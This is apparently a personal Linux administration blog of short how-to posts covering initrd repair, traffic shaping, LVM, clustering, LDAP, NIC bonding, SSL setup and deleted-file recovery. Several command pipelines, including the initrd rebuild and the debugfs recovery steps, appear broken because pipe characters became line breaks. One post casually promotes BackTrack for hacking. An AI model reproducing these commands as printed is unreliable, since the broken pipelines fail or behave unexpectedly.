Friday, August 19, 2011

Editing initrd

Today i become frosted when i found that installing window xp, erase fedora 9 from my laptop. But i recovered my grub because previously i taken backup of mbr using following command.


dd if=/dev/sda of=/root/mbr bs=446 count=1

I recovered my grub by overwriting /root/mbr on /dev/sda

dd if=/root/mbr of=/dev/sda .

But now, real pain started my system was unable to mount root because it search UUID specified in initrd-2.6.27.7.img, so i decided to edit my initrd.

For that firstly i unzip and uncompress cpio archived initrd

cd /root/vk

gunzip

After that i got content of initrd in /root/vk folder.

Then i edited /root/vk/init file and then again created cpio archived initrd

cd /root/vk

find .
cpio --create --format 'newc'>/tmp/vkinit

gzip /tmp/vkinit

cp /tmp/vkinit /boot/

Now i am able to mount my root.



Using usbmon

Using usbmon to monitor usb traffic


Steps of using usbmon are as follows

1. Prepare

Mount debugfs (it has to be enabled in your kernel configuration), and

load the usbmon module (if built as module). The second step is skipped

if usbmon is built into the kernel.

# mount -t debugfs none_debugs /sys/kernel/debug

# modprobe usbmon

#
Verify that bus sockets are present.

# ls /sys/kernel/debug/usbmon

0s 0u 1s 1t 1u 2s 2t 2u 3s 3t 3u 4s 4t 4u

#

Now you can choose to either use the socket '0u' (to capture packets on all

buses), and skip to step #3, or find the bus used by your device with step #2.

This allows to filter away annoying devices that talk continuously.

2. Find which bus connects to the desired device

Run "cat /proc/bus/usb/devices", and find the T-line which corresponds tothe device. Usually you do it by looking for the vendor string. If you have

many similar devices, unplug one and compare two /proc/bus/usb/devices outputs.

The T-line will have a bus number. Example:

T: Bus=03 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 2 Spd=12 MxCh= 0

D: Ver= 1.10 Cls=00(>ifc ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1

P: Vendor=0557 ProdID=2004 Rev= 1.00

S: Manufacturer=ATEN

S: Product=UC100KM V2.00

Bus=03 means it's bus 3.

3. Start 'cat'

# cat /sys/kernel/debug/usbmon/3u > /tmp/1.mon.out

to listen on a single bus, otherwise, to listen on all buses, type:

# cat /sys/kernel/debug/usbmon/0u > /tmp/1.mon.out

This process will be reading until killed. Naturally, the output can be

redirected to a desirable location. This is preferred, because it is going

to be quite long.

Use BackTrack for hacking

Dear friends


If you really interested in hacking, Use BackTrack, Its a operating system that provide a lots of tools for different kind of hacking. For more information you can visit following site.


Use backtrack 4, download using following link http://www.remote-exploit.org/backtrack.html

udev is a Device manager

udev is a generic kernel device manager. It runs as a daemon on a


Linux system and listens to uevents the kernel sends out (via netlink

socket) if a new device is initialized or a device is removed from the

system. The system provides a set of rules that match against exported

values of the event and properties of the discovered device. A

matching rule will possibly name and create a device node and run

configured programs to set-up and configure the device.

Different network interface for different program

For example, let's say you're a student living on-campus; the university provides you with broadband Internet access via Wi-Fi, which is great, except for the fact that you cannot trust it (yes, even when you're careful to use HTTPS and so on, I'll cover that in subsequent blog posts). A general solution to that problem would be getting your very own private Internet access, but being a student, you would prefer not to waste too much money into it, so you'll most likely take the cheapest subscription. So now you have two routes to the Internet: a fast but insecure one, and another that is private but slow. How to use both on the same computer? As bandwidth-intensive applications are often also the ones that don't really require privacy, one could imagine categorizing programs in a way so as to watch Internet TV over the Wi-Fi network while corresponding over the cable.


Here's how to do it with Linux, assuming that the default route is your private connection and that your Wi-Fi interface is named ath0, has IP address 10.1.2.3 and gateway 10.0.0.1:

Create a "wifi" user

adduser wifi

Mark packets coming from the wifi user

iptables -t mangle -A OUTPUT -m owner --uid-owner wifi -j MARK --set-mark 42

Apply the Wi-Fi IP address on them

iptables -t nat -A POSTROUTING -o ath0 -m mark --mark 42 -j SNAT --to-source 10.1.2.3

Route marked packets via Wi-Fi

ip rule add fwmark 42 table 42

ip route add default via 10.0.0.1 dev ath0 table 42

Launch programs as the wifi user

sudo -u wifi vlc

Step 1 is of course required only once; steps 2, 3 and 4 are better put together in a shell script. Regarding step 5, it is much more practical to edit your KDE menu entries for example and there specify that the program has to be run as the wifi user.

Linux as QOS Machine

The tc command allows administrators to build different QoS policies in their networks using Linux instead of very expensive dedicated QoS machines. Using Linux, you can implement QoS in all the ways any dedicated QoS machine can and even more. Also, one can make a bridge using a good PC running Linux that can be transformed into a very powerful and very cheap dedicated QoS machine.


Queueing determine the way data sent, controlling data upload and download by setting certain criteria is possible in linux. Although UDP doesn't have flow control feature by TCP has.

Queueing discipline can be categorized as Classless and Classfull.

Classless discipline are simplest can be used to delay, reschedule, drop and accept the data. These discipline can shape an interface. There are serveral qdisc implementation in linux such as FIFO(pfifo and bfifo),pfifo_fast,tbf,sfq and esfq. By Default pfifo_fast work in linux.

Why top and ps show diffrent priority?

There is some discrepancy in ps output caused by the fact that each system may use different values to represent the process priority and that the values have changed with the introduction of RT priorities.


The kernel stores the priority value in /proc//stat (let's call it p->prio) and ps reads the value and displays it in various ways to the user:

$ ps -A -o pri,opri,intpri,priority,pri_foo,pri_bar,pri_baz,pri_api,pid,commPRI PRI PRI PRI FOO BAR BAZ API PID COMMAND 19 80 80 20 0 21 120 -21 1 init 24 75 75 15 -5 16 115 -16 2 kthreadd139 -40 -40 -100 -120 -99 0 99 3 migration/0 24 75 75 15 -5 16 115 -16 4 ksoftirqd/0139 -40 -40 -100 -120 -99 0 99 5 watchdog/0139 -40 -40 -100 -120 -99 0 99 6 migration/1 24 75 75 15 -5 16 115 -16 7 ksoftirqd/1139 -40 -40 -100 -120 -99 0 99 8 watchdog/1 24 75 75 15 -5 16 115 -16 9 events/0

Yes, there are 8 undocumented values for the process priority that can be passed to -o option:

Option Computed as

prioirity p->priointpri 60 + p->prioopri 60 + p->priopri_foo p->prio - 20pri_bar p->prio + 1pri_baz p->prio + 100pri 39 - p->prioritypri_api -1 - p->priority

They were introduced to fit the values in certain intervals and compatibility with POSIX and other systems.

qemu vs kvm

The QEMU package provides a processor and system emulator which enables users to launch guest virtual machines not only under the same hardware platform as the host machine, but also dramatically different hardware platforms. For example, QEMU can be used to run a PPC guest on a x86 host. QEMU dynamically translates the machine code of the guest architecture into the machine code of the host architecture.


QEMU does full hardware virtualization; in other words, it would allow you to run a MIPS guest OS inside an x86 host. This is useful, but slower than the alternatives...

KVM is a hypervisor that leverages QEMU for device emulation. I believe (going from memory) this device emulation is basically limited to VGA, disk controllers, etc.
So... unless you have a compelling reason (guest platform different from host), it would be best to use KVM and QEMU together

Using dump

As we know if you are using dump as a backup system. Then modified tower of hanoi algorithm is suitable. But why?


The idea is is to make the numbers rise and fall to minimise the number of backups needed to do a full restore. Write yourself some sequences and figure out for yourself which ones you would need for a full backup. Try to figure out for each backup whether the same files will be dumped by a later backup. They will, if a later backup number is lower. The agorithm your aiming to create is Start with a level 0 and ignore everything before. from end of list, find the lowest number before you reach the starting dump. You'll need this backup. Make it the new start of list. from end of list, find the lowest number before you reach the starting dump. You'll need this backup. Make it the new start of list. etc. E.g. Given 0 3 2 5 4 7 6 9 To restore everything you need the 0, 2, 4 and 6. I.e. every second dump. You'll see that wherever you stop in that sequence, no more than 3 backups are required to recover everything.

Nice.Using the algorithm above I get the following:Sequence

Sequence Dumps needed

0 3 0 3

0 3 2 0 2

0 3 2 5 0 2 5

0 3 2 5 4 0 2 4

0 3 2 5 4 7 0 2 4 7

0 3 2 5 4 7 6 0 2 4 6

0 3 2 5 4 7 6 9 0 2 4 6 9

Every time a dump of level N is, eh, taken,earlier tapes of level N become obsolete and are free to go(*). In thiscase, that happens every other time.

lvm vs RAID1

So, what is the better approach? Using LVM mirroring capabilities or putting the LVM on a mdadm RAID 1.


lvm require extra log partition for mirroring. Altough that log partition doesn't require much space but still a extra pain.

LVM on mdadm RAID1 is more stable than LVM's own mirroring at the moment.

You don't need to partition the disk and create a new PV just for theLVM mirror log. You can use "--alloc anywhere" while creating the mirrorvolume and LVM will gladly allocate mirror log on one of your mirror legs.

What Is A Snapshot in lvm?

A snapshot is an operation in which we "freeze" the data on a logical volume, while still enabling writing new data.


This, of-course, is an oxymoron.

It is solved by splitting the data to old (written before taking the snapshot) and new (written after taking the snapshot).

The old data resides on the original logical volume.

The new data is written to a different disk.

When an application reads from the device, the underlying kernel code finds where lies the fresh copy of the data, and returns that to the application.

Meanwhile, we may mount the original (frozen) content on a different directory, and access it in read-only mode.

E.g. to backup the data.

Clustering in Linux

When one than one computer work together to perform a task, its known as Clustering.


There are four type of cluster

• Storage

• High availability

• Load balancing

• High performance

Above given type of clustering is basically based on objective of clustering.

Storage clusters provide a consistent file system image across servers in a cluster, allowing the

servers to simultaneously read and write to a single shared file system. A storage cluster

simplifies storage administration by limiting the installation and patching of applications to one

file system. Red Hat Cluster Suite provides storage clustering through Red Hat GFS.

High-availability clusters provide continuous availability of services by eliminating single points

of failure and by failing over services from one cluster node to another in case a node becomes

inoperative. Red Hat Cluster Suite provides high-availability clustering through its High-availability Service Management component.

Load-balancing clusters dispatch network service requests to multiple cluster nodes to balance

the request load among the cluster nodes. Node failures in a load-balancing cluster are not

visible from clients outside the cluster. Red Hat Cluster Suite provides load-balancing through

LVS (Linux Virtual Server).

High-performance clusters use cluster nodes to perform concurrent calculations. A

high-performance cluster allows applications to work in parallel, therefore enhancing the

performance of the applications. (High performance clusters are also referred to as

computational clusters or grid computing.)

User wise bandwidth control

Suppose you want to control download speed of a user test to 1mbps. linux provide iptables and tc command to help you in this scenario. HTB alogorithm can be implemented on network interface to control that.


Mark packet originated by user test with mark 6

iptables -t mangle -A OUTPUT -p tcp -m owner --uid-owner test -j MARK --set-mark 6

Following script can help in this situation

TC=/sbin/tc

IF=eth0

DNLD=1mbit

start() {

$TC qdisc add dev $IF root handle 1: htb default 30

$TC class add dev $IF parent 1: classid 1:1 htb rate $DNLD

$TC filter add dev $IF protocol ip parent 1:0 prio 1 handle 6 fw flowid 1:1

}

stop() {

$TC qdisc del dev $IF root

}

restart() {

stop

sleep 1

start

}

show() {

$TC -s qdisc ls dev $IF

}

case "$1" in

start)

echo -n "Starting bandwidth shaping: "

start

echo "done"

;;

stop)

echo -n "Stopping bandwidth shaping: "

stop

echo "done"

;;

restart)

echo -n "Restarting bandwidth shaping: "

restart

echo "done"

;;

show)

echo "Bandwidth shaping status for $IF:"

show

echo ""

;;

*)

pwd=$(pwd)

echo "Usage: tc.bash {start
stop
restart
show}"

;;

esac

exit 0

/etc/resolv.conf directives

There are five main configuration directive that one can use in /etc/resolv.conf


domain (Domain name of host, also set using hostname command)

search (which domain to search)

nameserver (dns server ip)

sortlist ( to specify subnet ) and

options (specify timeout,retry etc options)

--------------------------------------------

sample /etc/resolv.conf entry

-------------------

domain test.edu

nameserver 0.0.0.0

nameserver 10.11.0.200

nameserver 10.11.0.101

options timeout:2

samba : NTFS full control cab be applied on file why not on directories?

With Samba 3.3.x, we moved to using the returned Windows permissions (as mapped from POSIX ACLs) to control all file access. This gets us closer to Windows behavior,but there's one catch. "Full Control" includes the ability to delete a file, but in POSIX the ability to delete a file belongs to the containing directory, not the file itself.


So when we return the Windows permissions for a file ACL with "rwx" set, by default we'd like to map to "Full Control" (see the default setting of the parameter acl map full control) but we must remove the DELETE_ACCESS flag from the mapping, as that is not a permission that is granted. Thus the ACL editor doesn't see "DELETE_ACCESS"in the returned ACE entry, and so doesn't believe it's "Full Control".

If we don't remove the DELETE_ACCESS bit, the client will open a file for delete, and successfully get a file handle back, but the delete will fail when the set file info (delete this file) call is made. Windows clients only check the error return on the open for

delete call, not the actual set file info that allows the delete - if you fail that call Windows explorer silently ignores the error, tells you you have deleted the file, but the file is still there and will reappear on the next directory refresh, thus confusing users.

Implementing cluster

From last few days, i was searching to implement cluster on my single laptop. The idea was to become more familiar with clustering. Linuxquestios.org guys help me in this direction and i decided to use vmware server 2.1 to implement clustering among guest nodes. My laptop has ubuntu 9.1 installed and i installed rhel 5.1 as guest using vmware server. Going througth docs on clustering using vwware i concluded that i have to add a virtual scsi disk with diffrent bust allocation to my virtual guest. I added scsi1, then i changed some configuration in guest .vmx file, like. Earlier my major concern was how to implement a disk that can be shared among guests.


Following modifications in done in .vmx file

disk.locking = false

scsi1.present = true

scsi1.sharedbus = true

scsi1.virtualdev= "lsilogic"

scsi1:0.present = true

scsi1.0.filename = "d:virtualshareddisk"

scsi1:0.mode = "independent: -persistent"

scsi1:0.devicetype = "disk"

after that i restarted my guest. I jumped when i found that 'fdisk -l' command list my new disk.

So now i have disk that can be shared among my individual guest.

Since i already decided to use OCFS as cluster file system so i installed ocfs2-'uname -r' and ocfs-tools-'uname -r'. For managing grpahically i also installed ocfsconsole-'uname -r' (remember to replace 'uname -r' with your kernel version).

After installation, i noticed that two new script files get created inside /etc/initd.d. Files are o2cb and ocfs2. Now there is time to configure ocfs2, so i executed script

root#cd /etc/init.d

roooot#./o2cb configure

..
above command generated error that cluster.conf not found so i created /etc/ocfs2/cluster.conf with following details

cluster:

node_count=2

name=ocfs2

node:

ip_port=7777

ip_address=192.168.11.90

number=1

name=node1

cluster=ocfs2

node:

ip_port=7777

ip_address=192.168.11.100

number=2

name=node2

cluster=ocfs2

now execute

root#cd /etc/init.d

roooot#./o2cb configure

sucessful .

after that create new partition on /dev/sdb

after that execute

root# mkfs.ocfs2 -b 4k -C 32k -N4 -L shareddata /dev/sdb1 --fs-feature-level=max-compat

clustered file system created on /dev/sdb1, now mount it on guests

#mount -t ocfs2 /dev/sdb1 /mnt/shared

Great all worked ..

what is KVM ?

On sept 2, 2009 redhat announced the availability of the fourth update to its Red Hat Enterprise Linux 5 platform. With this update redhat offers a new sort of virtualization known as KVM.


So now you don't have to bother about new commands to test performance of guest machine. KVM make possible uniform support for the complete Linux environment, no different treatment for host and guest.

n December 2006, Linus Torvalds announced that new versions of the Linux kernel would include the virtualization tool known as KVM (Kernel Virtual Machine Monitor).

KVM merges hypervisor with kernel and thus reducing redundancy and speeding up execution time. A KVM driver communicate with kernel and act as a interface for userspace virtual machine. Memory management and scheduling of process done by kernel itself.

Multi-Level Security in SELINUX

Having information of different security levels on the same computer systems poses a real threat. It is not a straight-forward matter to isolate different information security levels, even though different users log in using different accounts, with different permissions and different access controls.


One of the solution is to purchase dedicated systems to each security level but this is very expensive. Another inexpensive solution is use MLS feature of selinux.

The term multi-level arises from the defense community's security classifications: Confidential, Secret, and Top Secret.

The Bell-La Padula Model (BLP) model is used in selinux to protect multi level data.

Under such a system, users, computers, and networks use labels to indicate security levels. Data can flow between like levels, for example between "Secret" and "Secret", or from a lower level to a higher level. This means that users at level "Secret" can share data with one another, and can also retrieve information from Confidential-level (i.e., lower-level), users. However, data cannot flow from a higher level to a lower level. This prevents processes at the "Secret" level from viewing information classified as "Top Secret". It also prevents processes at a higher level from accidentally writing information to a lower level. This is referred to as the "no read up, no write down" model.

Linux From Scratch

If you thinking about creating your own linux distro linuxfromscratch is right platform to start. The documentation available on http://www.linuxfromscratch.org/ is very helpful is creating custom distro. But there is also some points you should care before starting for new distro. Remember


"Understand what reason to develop new distro"

Replication method changed in openldap. After struggling a little , i managed to set up replication between two ldap server in master slave way.

This is how i achieved ldap replication in RHEL 5.2 with slapd version 2.3 43

===Provider ldap server =====

database bdb

suffix "dc=abc,dc=del"

rootdn "uid=root,ou=People,dc=abc,dc=del"

rootpw {SSHA}ifvOmrnBD6xEbsgTbY7n/EikFnKTbbhm

directory /var/lib/ldap/abc.del

index objectClass,entryCSN,entryUUID eq

index uidNumber,gidNumber,loginShell eq,pres

#replication

overlay syncprov

syncprov-checkpoint 1 5

syncprov-sessionlog 100

#monitoring ldap

database monitor

access to *

by dn.exact="uid=root,ou=People,dc=abc,dc=del" read

===Consumer LDAP Server =====

database bdb

suffix "dc=abp,dc=del"

directory /var/lib/ldap/abc.del

rootdn uid=root,ou=People,dc=abc,dc=del

syncrepl rid=000

provider=ldap://10.11.0.105

type=refreshOnly

interval=00:00:20:00

retry="60 +"

searchbase="dc=abc,dc=del"

attrs="*,+"

bindmethod=simple

binddn="uid=root,ou=People,dc=abc,dc=del"

=============================================================

Best Practices deploying LVM

1. Use multiple volume groups to define classes of storage.


2. Use full disk physical volumes over partitions.

3. I like unique naming of volume groups just so that if

a drive lands else where, and it presents itself to the system,

it will not collide with existing volume group names.

(but there is good reason for not doing this... and really

only a factor if you have a tendency to throw drives into

different computers all of the time)

How to set maximum size for a TCP Connection ?

Using iptables we can do this this


root# iptables -I FORWARD -o eth2 -p tcp --syn -j TCPMSS --set-mss 1440

Set maximum size of TCP connection to 1440

You can test using

root# tshark -n -i eth2 tcp port 80

Accidentally removed an lvm can i restore it?

Following command can be helpful in this scenario

vgcfgrestore

Also look at your /etc/lvm/archive/ for all archived metadata.

You should be able to use '--list' option.

which overlays are present in my openldap servers

Use the monitor backend and then search with following command


ldapsearch -b cn=overlays,cn=monitor -s sub monitoredInfo

Setting up monitor backend is also not a big deal

Enter following entries in /etc/openldap/slapd.conf

=================

database monitor

access to *

by dn.exact="cn=Manager,dc=example,dc=com

by * none

=====================

Move LVM Volume Group to another computer

To move a volume group form one system to another, perform the following steps:


Make sure that no users are accessing files on the active volumes in the volume group, then unmount the logical volumes.

Use the -a n argument of the vgchange command to mark the volume group as inactive, which prevents any further activity on the volume group.

Use the vgexport command to export the volume group. This prevents it from being accessed by the system from which you are removing it.

After you export the volume group, the physical volume will show up as being in an exported volume group when you execute the pvscan command.

When the disks are plugged into the new system, use the vgimport command to import the volume group, making it accessible to the new system.

Activate the volume group with the -a y argument of the vgchange command.

Mount the file system to make it available for use.

Team multiple network interface into single interface

Linux allows binding multiple network interfaces into a single channel/NIC using special kernel module called bonding.


After trying few hours i became successful in implementing bonding on RHEL 5.2. The steps that implemented bonding is given below.

Step #1: Create a bond0 configuration file

First, create bond0 config file in /etc/sysconfig/network-scripts/

# vi /etc/sysconfig/network-scripts/ifcfg-bond0Append following lines to it:DEVICE=bond0

IPADDR=192.168.1.20

NETWORK=192.168.1.0

NETMASK=255.255.255.0

USERCTL=no

BOOTPROTO=none

ONBOOT=yes

Step #2: Modify eth0 and eth1 config files:

Open both configuration using vi text editor and make sure file read as follows for eth0 interface# vi /etc/sysconfig/network-scripts/ifcfg-eth0 Modify/append directive as follows:DEVICE=eth0

USERCTL=no

ONBOOT=yes

MASTER=bond0

SLAVE=yes

BOOTPROTO=none

And do same for /etc/sysconfig/network-scripts/ifcfg-eth1

Step # 3: Load bond driver/module

Make sure bonding module is loaded when the channel-bonding interface (bond0) is brought up. One need to modify kernel modules configuration file:# vi /etc/modprobe.conf Append following two lines:alias bond0 bonding

options bond0 mode=balance-alb miimon=100

Save file and exit to shell prompt.

Step # 4: Test configuration

First, load the bonding module:

# modprobe bonding

Restart networking service in order to bring up bond0 interface

# service network restart

Verify everything is working:# less /proc/net/bonding/bond0Output:

Bonding Mode: load balancing (round-robin)

MII Status: up

MII Polling Interval (ms): 0

Up Delay (ms): 0

Down Delay (ms): 0

Slave Interface: eth0

MII Status: up

Link Failure Count: 0

Permanent HW addr: 00:0c:29:c6:be:59

Slave Interface: eth1

MII Status: up

Link Failure Count: 0

Permanent HW addr: 00:0c:29:c6:be:63

List all interfaces:# ifconfig

I want separate 'document root' in Apache .

To set separate document root in httpd , we need to make certain changes in httpd.conf. Add following line in httpd.conf


Alias /personal/vishesh /var/personal_work_area/vishesh



DirectoryIndex index.php



After that create .htaccess file inside /var/personal_work_area/vishesh and put following entry in that

Options +FollowSymLinks

RewriteEngine On

RewriteBase /personal/vishesh/test

RewriteRule ^alice.html$ bob.html

alice.html and bob.html are html files

Using SSL Certificate in your web site

1) Generate a key:


$ openssl genrsa -out www.example.com-key 2048

Generating RSA private key, 2048 bit long modulus

2) Generate a Certificate Sigining Request (CSR):

$ openssl req -new -key www.example.com-key -out

www.example.com-csr

You are about to be asked to enter information that will be

incorporated

into your certificate request.

What you are about to enter is what is called a Distinguished

Name or a DN.

There are quite a few fields but you can leave some blank

For some fields there will be a default value,

If you enter '.', the field will be left blank.

-----

Country Name (2 letter code) [GB]:

State or Province Name (full name) [Berkshire]:Greater London

Locality Name (eg, city) [Newbury]:London

Organization Name (eg, company) [My Company Ltd]:Acme Websites

Ltd.

Organizational Unit Name (eg, section) []:

Common Name (eg, your name or your server's hostname)

[]:www.example.com

Email Address []:

Please enter the following 'extra' attributes

to be sent with your certificate request

A challenge password []:

An optional company name []:

3) Buy a certificate:

You can buy certificate from verisign, or thwate or such CA. What you need to do is goto website of these Certificate Authority and submit your csr file.

4) Setup an SSL Vhost:



ServerName "www.example.com"

SSLEngine on

SSLCertificateFile "/etc/httpd/conf/ssl/www.example.com-cert"

SSLCertificateKeyFile "/etc/httpd/conf/ssl/www.example.com-key"

...

Complete system backup using dump

Today i n installed a new linux server , and after setting my servers i take system backup on my dat by writing a shell script in follwoing way


root#vi sysbackup.sh

mt -f /dev/st0 rewind

dump -0uf /dev/nst0 /

dump -0uf /dev/nst0 /boot

dump -0uf /dev/nst0 /home

dump -0uf /dev/nst0 /opt

dump -0uf /dev/nst0 /tmp

dump -0uf /dev/nst0 /usr

dump -0uf /dev/nst0 /var

echo "Backup Completed!"
:wq

root# Now executing my script resulted in completed file system backup on tape.

Must configure ldap.conf

I setup a ldap server to authenticating linux clients. My setup was ok , and clients was authenticating from server properly. Today due to some reason my ldap server become down and i try to logon linux using local account. But there was long time taken by clients for login screen, i become fade up with that, i edited my /etc/nsswitch.conf file in single use mode, removed ldap from passwd and group section. But then i concluded that this occur occur because my ldap client configuration is not proper. I edited my /etc/ldap.conf and entered following entries in it.


base dc=abc,dc=del

uri ldaps:// s1.abc.del ldaps://s2.abc.del

ldap_version 3

timelimit 10

bind_timelimit 10

nss_initgroups_ignoreusers root,ldap,named,avahi,

haldaemon,dbus,radvd,tomcat,radiusd,news,mailman

ssl yes

pam_password md5

nss_base_passwd ou=People,dc=abc,dc=del

nss_base_group dc=abc,dc=del

use_sasl off

tls_checkpeer yes

TLS_CACERTFILE /etc/pki/tls/certs/ca-bundle.crt

bind_policy hard_open

idle_timelimit 3550

Now everything is fine.

How du and df is diffrent ?

df and du measure two different things....


du reports the space used by files and folders--even this is more than the file size. A few quick experiments on my system show that 4K is a minimum file size in terms of disk space.

df reports the space used by the file system. This includes the overhead for journals and inode tables and such.

Finding the deleted node.

Today i found that some of the files are missing from my server, then i tried debugfs

# debugfs /dev/hda2

debugfs: lsdel

OR

echo lsdel
debugfs /dev/hda1 > lsdel.out

debugfs has a stat command which prints details about an inode. Issue the command for each inode in your recovery list. For example, if you're interested in inode number 148003, try this:

debugfs: stat <148003>

If you have a lot of files to recover, you'll want to automate this. Assuming that your lsdel list of inodes to recover in is in lsdel.out, try this:

# cut -c1-6 lsdel.out
grep "[0-9]"
tr -d " " > inodes

This new file inodes contains just the numbers of the inodes to recover, one per line. We save it because it will very likely come in handy later on. Then you just say:

# sed 's/^.*$/stat <\0>/' inodes
debugfs /dev/hda1 > stats

and stats contains the output of all the stat commands.

If the file was no more than 12 blocks long, then the block numbers of all its data are stored in the inode: you can read them directly out of the stat output for the inode. Moreover, debugfs has a command which performs this task automatically. To take the example we had before, repeated here:

debugfs: stat <148003>

Inode: 148003 Type: regular Mode: 0644 Flags: 0x0 Version: 1

User: 503 Group: 100 Size: 6065

File ACL: 0 Directory ACL: 0

Links: 0 Blockcount: 12

Fragment: Address: 0 Number: 0 Size: 0

ctime: 0x31a9a574 -- Mon May 27 13:52:04 1996

atime: 0x31a21dd1 -- Tue May 21 20:47:29 1996

mtime: 0x313bf4d7 -- Tue Mar 5 08:01:27 1996

dtime: 0x31a9a574 -- Mon May 27 13:52:04 1996

BLOCKS:

594810 594811 594814 594815 594816 594817

TOTAL: 6

This file has six blocks. Since this is less than the limit of 12, we get debugfs to write the file into a new location, such as /mnt/recovered.000:

debugfs: dump <148003> /mnt/recovered.000

Of course, this can also be done with fsgrab; I'll present it here as an example of using it:

# fsgrab -c 2 -s 594810 /dev/hda1 > /mnt/recovered.000

# fsgrab -c 4 -s 594814 /dev/hda1 >> /mnt/recovered.000

With either debugfs or fsgrab, there will be some garbage at the end of /mnt/recovered.000, but that's fairly unimportant. If you want to get rid of it, the simplest method is to take the Size field from the inode, and plug it into the bs option in a dd command line:

# dd count=1 if=/mnt/recovered.000 of=/mnt/resized.000 bs=6065

Why ssh sometime become slow ?

Sometime you found that that ssh take more than 20 seconds before it ask for login.


The reason for the slow connections is that SSH is trying to use Kerberos, hangs

for about 10 seconds, then tries public key authentication, hangs for about

10 seconds, and then finally prompts for password. By setting the "GSSAPIAuthentication" option to false, either in /etc/ssh/ssh_config, or on the command line, everything works perfectly.

How to configure multiple vhosts with SSL ?

The problem is that in order to know from which virtual host to serve content a


webserver must inspect the "host" header. This is part of the http

request. However the SSL handshake takes place before any http request

is initiated. In order to complete the handshake the webserver needs

to know which SSL certificate to use. Since the websever can't yet

know which virtual host content is being requested from it uses the

certificate of the first host. It's really a limit of the protocol, not the server.

However the latest version of the HTTPS protocol includes SNI, which

permits a client to transmit to the host the name of the virtualhost

it wants to contact during the SSL handshake. So what you need to do

is make sure you have the very latest apache, compiled with the latest

openssl libraries, and use a recent webbrowser.

How to list active Apache modules ?

Sometime we stuck with some basic things in Apache. httpd command is very useful in this way.


To list active modules in Apache

root# httpd -t -D DUMP_MODULES

or

root# httpd -M

To list compiled in modules

root#httpd -l

To get virtual host lists

root#httpd -S

To test httpd configuration

root#httpd -t

Understanding vmstat output

As we know vmstat is very useful command to monitor system performance in linux. I issued this command on my RHEL Server, and output is as follows


root# vmstat

procs -------- --------memory------ ---swap--- --io-- ----system- ---cpu--------

r b swpd free buff cache si so bi bo in cs us sy id wa st

0 0 128 1217472 302800 2383476 0 0 17 14 10 15 0 0 100 0 0


What we can conclude from this output ?

Let us first understand, meaning of this result.

procs refer process. r for running and b for blocking.

swpd refer swapping free refer free memory, buff memory used in buffering and so for cache

swap section include swap in(si) and swap out (so)

io section include block in (bi) and block out(bo)

system section include interrupt(in) and context switch (cs)

cpu in important section, it include cpu usage by us(user) and sy(system) process,id (idle) percentage of cpu. wa refer time waiting for IO and st refer time stolen from virtual machine.

Linux Boot Process

As soon as we boot out linux system, after bios execution , Stage1 boot loading take place. In stage1 boot loading the code inside Master Boot Record of booting disk execute. MBR consist 512 bytes which include 446 bye booting instruction, 64 byte partition table and 2 byte magic number.


The 446 bye of mbr, load 2nd stage of boot loader. For example if you are using GRUB as boot loader, the GRUB is so big that it can't fit in 446 byte. So mbr load 2nd stage of boot loader.

What is 1.5 stage of boot loader ?

Unlike LILO GRUB can load a Linux kernel from an ext2 or ext3 file system. It does this by making the two-stage boot loader into a three-stage boot loader. Suppose your kernel is on partition formatted by ext2 or ext3, then GRUB first load e2fs_stage1_5 then proceed to stage 2.

With stage 2 loaded, GRUB can, upon request, display a list of available kernels, /boot/grub/grub.conf get diaplayed. You can select a kernel and insert kernel parameters if required.Here, you can use a command-line shell for greater manual control over the boot process.

After stage2 specify kernel and root filesystem, kernel uncompress and loaded after that root filesystem mounted. If your kernel executes and root file system (/) get mounted properly. Next stage will be of system initialization.

Remember that kernel panic error may panic you if your root filesystem not mounted properly.
init is the first user space process run after kernel loading. Setting for init process present in /etc/inittab, wrong configuration of /etc/inittab may also disturb you.

TCP Wrapper

TCP Wrapper add additional layer of protection for linux system. TCP Wrappers can be used to GRANT or DENY access to various network services on your machine to the outside network or other machines on the same network. It does this by using simple access list rules which are included in the two files /etc/hosts.allow and /etc/hosts.deny .


One must remember that hosts.allow takes precedence over hosts.deny. So for example if host A is allowed to ssh access your system using hosts.allow then hosts.deny entry doesn't affect any way. Also remember that by default all sort of incoming and outgoing is allowed if respective entries missing in both hosts.allow and hosts.deny.

Example of using TCP Wrapper

Suppose you want to allow SSH access to hosts in a particular domain say abc.com and deny access to all the others. Then edit hosts.allow and hosts.deny files in following ways

/etc/hosts.allow
sshd : .abc.com

/etc/hosts.deny
sshd : ALL
I will also discuss some complex examples of using tcp wrapper in coming days.

Linux Network Installation

As we know we can install linux from network, the steps for network installation are very simple. One need to specify 'linux askmethod' at installation prompt. By keeping installation tree on NFS, HTTP or FTP server on can install linux on network client computers.


But booting into linux require linux bootable dvd or cd. By PXE network installation there is no need to keep linux bootable cd or dvd. System get bootable through network card pxe boot loader.

For PXE Network installation, one need to create following setup

Configure the network (NFS, FTP, HTTP) server to export the installation tree.

Configure the files on the tftp server necessary for PXE booting.

Configure which hosts are allowed to boot from the PXE configuration.

Start the tftp service.

Configure DHCP.

After given steps boot the client, and start the installation

PXE Boot Configuration

system-config-netboot , command present graphical screen to setup PXE boot configuration.

Command that can be used on text terminal is pxeos

By setting up DHCP and installtion tree on NFS,FTP or HTTP one can install linux using PXE.

Following link can be used to get exact steps

http://www.redhat.com/docs/manuals/enterprise/RHEL-4-Manual/sysadmin-guide/ch-pxe.html

Logging telnet sessions

We can use TCP Wrapper in logging telnet access of system. spawn is used to launches shell command as child process, this concept can be used to log telnet session. To achieve this just do following entries in /etc/hosts.allow on system hosting telnet server


in.telnetd : .abc.com : spawn /bin/echo `/bin/date` from %h>>/var/log/telnet.log : allow

Secure deletion of files

Suppose you want to delete a file in a way that it become impossible to recover that. Normally when we delete a file the data is not actually destroyed only the index listing where the file is stored is destroyed. There a number of recovery tools that try to rebuild the index and recover the data.


On a busy system freed space may get used reused in second in that case data recovery become impossible, but suppose you want to be sure that after deletion none of method get data back. The best way is destroy the media which holding data, but in case of large capacity this is not practical solution. shred utility try to achieve similar affect. So shred command help in securely deleting files.

Understanding subshell

To understand concept of subshell, let us take an example


suppose we execute following command

root#pwd

/root

root#cd /opt/backup;pwd

output will be

/opt/backup

root# pwd

/opt/backup

Now try to execute following command

root# (cd /opt/backup;pwd)

/opt/backup

But

root#pwd

/root

We can notice the diffrence , in () causes sub-shell to be invoked, in

which change of directory in executed, after executing pwd in subshell

the sub shell ceases to exist. back in current shell , so we are still

in /root

Migration old style slapd.conf to new slapd-config

